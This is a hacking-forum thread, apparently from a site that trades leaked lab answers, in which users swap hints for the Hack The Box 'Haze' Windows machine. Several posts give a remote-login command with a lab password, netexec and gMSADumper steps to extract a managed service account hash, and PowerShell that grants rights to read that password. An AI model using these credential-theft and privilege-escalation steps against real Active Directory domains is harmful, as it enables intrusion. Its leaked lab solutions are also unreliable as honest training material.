Haze - Hack The Box Season 7 - Windows Hard
by ShitWhiffler - Saturday March 29, 2025 at 06:59 PM
#11
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i haze.htb
Reply
#12
did someone get anything?
Reply
#13
besides mark.adams being in gMSA_Managers, nothing.
Reply
#14
how did u get this password for paul ? seems uncrackable through hashcat

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reposting hidden content for free
Reply
#15
(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group
Reply
#16
(Mar 29, 2025, 09:55 PM)pop10189 Wrote:
(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?
Reply
#17
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 09:55 PM)pop10189 Wrote:
(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa
Reply
#18
(Mar 29, 2025, 10:12 PM)pop10189 Wrote:
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 09:55 PM)pop10189 Wrote:
(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash no NTLM
Reply
#19
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 10:12 PM)pop10189 Wrote:
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 09:55 PM)pop10189 Wrote:
(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash no NTLM

First you need to add your self as a member to read Gmsa
Reply
#20
(Mar 29, 2025, 10:16 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 10:12 PM)pop10189 Wrote:
(Mar 29, 2025, 10:05 PM)kyakeiuwu Wrote:
(Mar 29, 2025, 09:55 PM)pop10189 Wrote:
(Mar 29, 2025, 09:33 PM)jaybit Wrote: besides mark.adams being in gMSA_Managers, nothing.

you can extract GMSA account hash, then that account can add owner to Support_Services group which i dont know tf i could do with this group

I was not able to do that. Can you tell how?

look for GMSA section https://notes.qazeer.io/active-directory...exploiting

 Then extract the GMSA using netexec ldap -u mark... -p .... --gmsa

Account: Haze-IT-Backup$      NTLM:

I literally got this as the hash no NTLM


Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword "mark.adams"
$user = Get-ADUser -Identity "mark.adams"
Set-ADServiceAccount -Identity "Haze-IT-Backup" -PrincipalsAllowedToRetrieveManagedPassword $user.DistinguishedName

then gMSADumper should work
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS • CWES • CDSA • CWEE Exam Hint 3midjets 234 33,206 8 hours ago
Last Post: breachaddictt
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 608 96,111 8 hours ago
Last Post: breachaddictt
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 30 1,864 8 hours ago
Last Post: breachaddictt
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 106 10,220 11 hours ago
Last Post: kkkreoifezrg
  JET fortress writeup + flags ssrf 39 19,229 Yesterday, 08:21 PM
Last Post: vlxw

Forum Jump:


 Users browsing this forum: 1 Guest(s)